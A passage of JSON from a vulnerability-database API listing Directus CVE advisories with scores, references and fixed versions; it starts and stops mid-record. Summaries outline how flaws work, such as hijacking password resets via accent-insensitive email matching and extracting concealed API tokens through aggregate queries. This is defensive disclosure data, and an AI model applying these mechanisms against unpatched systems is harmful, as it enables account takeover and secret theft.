against permissions when injecting the `where` clauses for applying the search query. This leads to the possibility of enumerating those un-permitted fields. Version 11.5.0 fixes the issue.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-30352", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00144", "scoring_system": "epss", "scoring_elements": "0.3465", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00144", "scoring_system": "epss", "scoring_elements": "0.34647", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00144", "scoring_system": "epss", "scoring_elements": "0.3467", "published_at": "2026-06-13T12:55:00Z" }, { "value": "0.00144", "scoring_system": "epss", "scoring_elements": "0.3447", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-30352" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-30352", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-30352" }, { "reference_url": "https://github.com/directus/directus/commit/ac5a9964d9926f20dc063a74cb417dc7bbad676d", "reference_id": "ac5a9964d9926f20dc063a74cb417dc7bbad676d", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-03-27T15:14:43Z/" } ], "url": "https://github.com/directus/directus/commit/ac5a9964d9926f20dc063a74cb417dc7bbad676d" }, { "reference_url": "https://github.com/advisories/GHSA-7wq3-jr35-275c", "reference_id": "GHSA-7wq3-jr35-275c", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-7wq3-jr35-275c" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-7wq3-jr35-275c", "reference_id": "GHSA-7wq3-jr35-275c", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-03-27T15:14:43Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-7wq3-jr35-275c" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/377846?format=api", "purl": "pkg:npm/directus@11.5.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-32e6-c1bv-efea" }, { "vulnerability": "VCID-8q3p-rrv2-jba5" }, { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": "VCID-9r91-qgfa-x7ak" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-ah8z-vr21-wfd6" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-c4eu-udp3-uuen" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-qfnx-egwg-ybgp" }, { "vulnerability": "VCID-rdpb-7dcd-fyby" }, { "vulnerability": "VCID-rren-vtar-23fm" }, { "vulnerability": "VCID-tp8r-hnf7-fkaf" }, { "vulnerability": "VCID-u5hw-p46t-jybc" }, { "vulnerability": "VCID-ufth-uy5w-87fe" }, { "vulnerability": "VCID-v6mk-ybv3-tyc8" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-ywqb-qrvw-hfbh" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.5.0" } ], "aliases": [ "CVE-2025-30352", "GHSA-7wq3-jr35-275c" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-dcw5-6ct3-b3ev" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/166999?format=api", "vulnerability_id": "VCID-eb1b-zvas-muey", "summary": "Directus is a free and open-source data platform for headless content management. The Directus process can be aborted by having an authorized user update the `filename_disk` value to a folder and accessing that file through the `/assets` endpoint. This vulnerability has been patched and release v9.15.0 contains the fix. Users are advised to upgrade. Users unable to upgrade may prevent this problem by making sure no (untrusted) non-admin users have permissions to update the `filename_disk` field on `directus_files`.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2022-36031", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0026", "scoring_system": "epss", "scoring_elements": "0.49762", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.0026", "scoring_system": "epss", "scoring_elements": "0.49768", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.0026", "scoring_system": "epss", "scoring_elements": "0.49781", "published_at": "2026-06-13T12:55:00Z" }, { "value": "0.0026", "scoring_system": "epss", "scoring_elements": "0.49626", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2022-36031" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2022-36031", "reference_id": "CVE-2022-36031", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-36031" }, { "reference_url": "https://github.com/advisories/GHSA-77qm-wvqq-fg79", "reference_id": "GHSA-77qm-wvqq-fg79", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-77qm-wvqq-fg79" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-77qm-wvqq-fg79", "reference_id": "GHSA-77qm-wvqq-fg79", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:45:00Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-77qm-wvqq-fg79" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/26040?format=api", "purl": "pkg:npm/directus@9.15.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-32e6-c1bv-efea" }, { "vulnerability": "VCID-54ja-4vrx-tbgm" }, { "vulnerability": "VCID-79ch-vtkp-q3cd" }, { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": "VCID-9r91-qgfa-x7ak" }, { "vulnerability": "VCID-9t8b-59vc-kbea" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-ah8z-vr21-wfd6" }, { "vulnerability": "VCID-b8ya-2bmn-e3h5" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-bsua-aktm-1qfd" }, { "vulnerability": "VCID-c4eu-udp3-uuen" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-dcw5-6ct3-b3ev" }, { "vulnerability": "VCID-eyv5-91cq-pyf9" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-gf4m-ad8j-7bbn" }, { "vulnerability": "VCID-jvtg-cnnb-7ubg" }, { "vulnerability": "VCID-jy2x-jbbb-zua5" }, { "vulnerability": "VCID-pvfa-xp3e-8kg2" }, { "vulnerability": "VCID-qeh1-cm33-93g1" }, { "vulnerability": "VCID-qfnx-egwg-ybgp" }, { "vulnerability": "VCID-qrf3-cz1h-8kau" }, { "vulnerability": "VCID-rdpb-7dcd-fyby" }, { "vulnerability": "VCID-rren-vtar-23fm" }, { "vulnerability": "VCID-s39d-aw92-hydh" }, { "vulnerability": "VCID-snux-8b2e-9kd6" }, { "vulnerability": "VCID-t1by-h5au-rqbu" }, { "vulnerability": "VCID-tp8r-hnf7-fkaf" }, { "vulnerability": "VCID-u121-7x5t-3fcg" }, { "vulnerability": "VCID-u4er-eddz-g7aq" }, { "vulnerability": "VCID-u5hw-p46t-jybc" }, { "vulnerability": "VCID-ua8h-tmak-hufd" }, { "vulnerability": "VCID-ufth-uy5w-87fe" }, { "vulnerability": "VCID-v2je-s9mk-e3h1" }, { "vulnerability": "VCID-v6mk-ybv3-tyc8" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-ywqb-qrvw-hfbh" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.15.0" } ], "aliases": [ "CVE-2022-36031", "GHSA-77qm-wvqq-fg79" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-eb1b-zvas-muey" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/55903?format=api", "vulnerability_id": "VCID-eyv5-91cq-pyf9", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. The password reset mechanism of the Directus backend allows attackers to receive a password reset email of a victim user, specifically having it arrive at a similar email address as the victim with a one or more characters changed to use accents. This is due to the fact that by default MySQL/MariaDB are configured for accent-insensitive and case-insensitive comparisons. This vulnerability is fixed in version 10.8.3.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-27295", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00604", "scoring_system": "epss", "scoring_elements": "0.7008", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00604", "scoring_system": "epss", "scoring_elements": "0.70182", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00604", "scoring_system": "epss", "scoring_elements": "0.70185", "published_at": "2026-06-13T12:55:00Z" }, { "value": "0.00604", "scoring_system": "epss", "scoring_elements": "0.7017", "published_at": "2026-06-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-27295" }, { "reference_url": "https://dev.mysql.com/doc/refman/8.0/en/charset-unicode-sets.html", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://dev.mysql.com/doc/refman/8.0/en/charset-unicode-sets.html" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://github.com/directus/directus/commit/a8ef790ea2d28b1727f9027d99bd360920d57919", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus/commit/a8ef790ea2d28b1727f9027d99bd360920d57919" }, { "reference_url": "https://www.monolune.com/articles/what-is-the-utf8mb4_0900_ai_ci-collation", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://www.monolune.com/articles/what-is-the-utf8mb4_0900_ai_ci-collation" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27295", "reference_id": "CVE-2024-27295", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27295" }, { "reference_url": "https://github.com/advisories/GHSA-qw9g-7549-7wg5", "reference_id": "GHSA-qw9g-7549-7wg5", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-qw9g-7549-7wg5" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-qw9g-7549-7wg5", "reference_id": "GHSA-qw9g-7549-7wg5", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-03-05T19:45:59Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-qw9g-7549-7wg5" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/29477?format=api", "purl": "pkg:npm/directus@10.8.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-32e6-c1bv-efea" }, { "vulnerability": "VCID-45yr-y58u-aqb8" }, { "vulnerability": "VCID-4z1u-rtza-83bj" }, { "vulnerability": "VCID-54ja-4vrx-tbgm" }, { "vulnerability": "VCID-79ch-vtkp-q3cd" }, { "vulnerability": "VCID-8q3p-rrv2-jba5" }, { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": "VCID-9r91-qgfa-x7ak" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-ah8z-vr21-wfd6" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-c4eu-udp3-uuen" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-dcw5-6ct3-b3ev" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-gf4m-ad8j-7bbn" }, { "vulnerability": "VCID-jy2x-jbbb-zua5" }, { "vulnerability": "VCID-pvfa-xp3e-8kg2" }, { "vulnerability": "VCID-qeh1-cm33-93g1" }, { "vulnerability": "VCID-qfnx-egwg-ybgp" }, { "vulnerability": "VCID-qrf3-cz1h-8kau" }, { "vulnerability": "VCID-rdpb-7dcd-fyby" }, { "vulnerability": "VCID-rren-vtar-23fm" }, { "vulnerability": "VCID-s39d-aw92-hydh" }, { "vulnerability": "VCID-snux-8b2e-9kd6" }, { "vulnerability": "VCID-t1by-h5au-rqbu" }, { "vulnerability": "VCID-tp8r-hnf7-fkaf" }, { "vulnerability": "VCID-u5hw-p46t-jybc" }, { "vulnerability": "VCID-ua8h-tmak-hufd" }, { "vulnerability": "VCID-ufth-uy5w-87fe" }, { "vulnerability": "VCID-v2je-s9mk-e3h1" }, { "vulnerability": "VCID-v6mk-ybv3-tyc8" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-ywqb-qrvw-hfbh" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.8.3" } ], "aliases": [ "CVE-2024-27295", "GHSA-qw9g-7549-7wg5" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-eyv5-91cq-pyf9" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/210858?format=api", "vulnerability_id": "VCID-fy6n-dp1y-93g5", "summary": "Server-Side Request Forgery in Directus", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2022-23080", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00116", "scoring_system": "epss", "scoring_elements": "0.30184", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00116", "scoring_system": "epss", "scoring_elements": "0.29987", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00116", "scoring_system": "epss", "scoring_elements": "0.30181", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00116", "scoring_system": "epss", "scoring_elements": "0.302", "published_at": "2026-06-13T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2022-23080" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://github.com/directus/directus/commit/6da3f1ed5034115b1da00440008351bf0d808d83", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus/commit/6da3f1ed5034115b1da00440008351bf0d808d83" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2022-23080", "reference_id": "CVE-2022-23080", "reference_type": "", "scores": [ { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-23080" }, { "reference_url": "https://www.mend.io/vulnerability-database/CVE-2022-23080", "reference_id": "CVE-2022-23080", "reference_type": "", "scores": [ { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://www.mend.io/vulnerability-database/CVE-2022-23080" }, { "reference_url": "https://github.com/advisories/GHSA-5h75-pvq4-82c9", "reference_id": "GHSA-5h75-pvq4-82c9", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-5h75-pvq4-82c9" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/20019?format=api", "purl": "pkg:npm/directus@9.7.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-32e6-c1bv-efea" }, { "vulnerability": "VCID-54ja-4vrx-tbgm" }, { "vulnerability": "VCID-79ch-vtkp-q3cd" }, { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": "VCID-9r91-qgfa-x7ak" }, { "vulnerability": "VCID-9t8b-59vc-kbea" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-ah8z-vr21-wfd6" }, { "vulnerability": "VCID-b8ya-2bmn-e3h5" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-bsua-aktm-1qfd" }, { "vulnerability": "VCID-c4eu-udp3-uuen" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-dcw5-6ct3-b3ev" }, { "vulnerability": "VCID-eb1b-zvas-muey" }, { "vulnerability": "VCID-eyv5-91cq-pyf9" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-gf4m-ad8j-7bbn" }, { "vulnerability": "VCID-jvtg-cnnb-7ubg" }, { "vulnerability": "VCID-jy2x-jbbb-zua5" }, { "vulnerability": "VCID-pvfa-xp3e-8kg2" }, { "vulnerability": "VCID-qeh1-cm33-93g1" }, { "vulnerability": "VCID-qfnx-egwg-ybgp" }, { "vulnerability": "VCID-qrf3-cz1h-8kau" }, { "vulnerability": "VCID-rdpb-7dcd-fyby" }, { "vulnerability": "VCID-rren-vtar-23fm" }, { "vulnerability": "VCID-s39d-aw92-hydh" }, { "vulnerability": "VCID-tp8r-hnf7-fkaf" }, { "vulnerability": "VCID-u121-7x5t-3fcg" }, { "vulnerability": "VCID-u4er-eddz-g7aq" }, { "vulnerability": "VCID-u5hw-p46t-jybc" }, { "vulnerability": "VCID-ua8h-tmak-hufd" }, { "vulnerability": "VCID-ufth-uy5w-87fe" }, { "vulnerability": "VCID-v2je-s9mk-e3h1" }, { "vulnerability": "VCID-v6mk-ybv3-tyc8" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-ywqb-qrvw-hfbh" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.7.0" } ], "aliases": [ "CVE-2022-23080", "GHSA-5h75-pvq4-82c9" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-fy6n-dp1y-93g5" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/71620?format=api", "vulnerability_id": "VCID-ga3s-595f-2keq", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.17.0, aggregate functions (min, max) applied to fields with the conceal special type incorrectly return raw database values instead of the masked placeholder. When combined with groupBy, any authenticated user with read access to the affected collection can extract concealed field values, including static API tokens and two-factor authentication secrets from directus_users. This vulnerability is fixed in 11.17.0.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35442", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04829", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04832", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00026", "scoring_system": "epss", "scoring_elements": "0.0784", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00026", "scoring_system": "epss", "scoring_elements": "0.07846", "published_at": "2026-06-13T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35442" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35442", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35442" }, { "reference_url": "https://github.com/advisories/GHSA-38hg-ww64-rrwc", "reference_id": "GHSA-38hg-ww64-rrwc", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-38hg-ww64-rrwc" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-38hg-ww64-rrwc", "reference_id": "GHSA-38hg-ww64-rrwc", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-07T13:30:05Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-38hg-ww64-rrwc" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/373752?format=api", "purl": "pkg:npm/directus@11.17.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.17.0" } ], "aliases": [ "CVE-2026-35442", "GHSA-38hg-ww64-rrwc" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ga3s-595f-2keq" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/124112?format=api", "vulnerability_id": "VCID-gf4m-ad8j-7bbn", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. Prior to version 11.2.0, when sharing an item, a typical user can specify an arbitrary role. It allows the user to use a higher-privileged role to see fields that otherwise the user should not be able to see. Instances that are impacted are those that use the share feature and have specific roles hierarchy and fields that are not visible for certain roles. Version 11.2.0 contains a patch the issue.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-24353", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00347", "scoring_system": "epss", "scoring_elements": "0.57651", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00347", "scoring_system": "epss", "scoring_elements": "0.57767", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00347", "scoring_system": "epss", "scoring_elements": "0.57784", "published_at": "2026-06-13T12:55:00Z" }, { "value": "0.00471", "scoring_system": "epss", "scoring_elements": "0.65161", "published_at": "2026-06-14T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-24353" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-24353", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-24353" }, { "reference_url": "https://github.com/directus/directus/pull/23716", "reference_id": "23716", "reference_type": "", "scores": [ { "value": "5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-23T18:52:42Z/" } ], "url": "https://github.com/directus/directus/pull/23716" }, { "reference_url": "https://github.com/directus/directus/commit/e288a43a79613dada905da683f4919c6965ac804", "reference_id": "e288a43a79613dada905da683f4919c6965ac804", "reference_type": "", "scores": [ { "value": "5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": 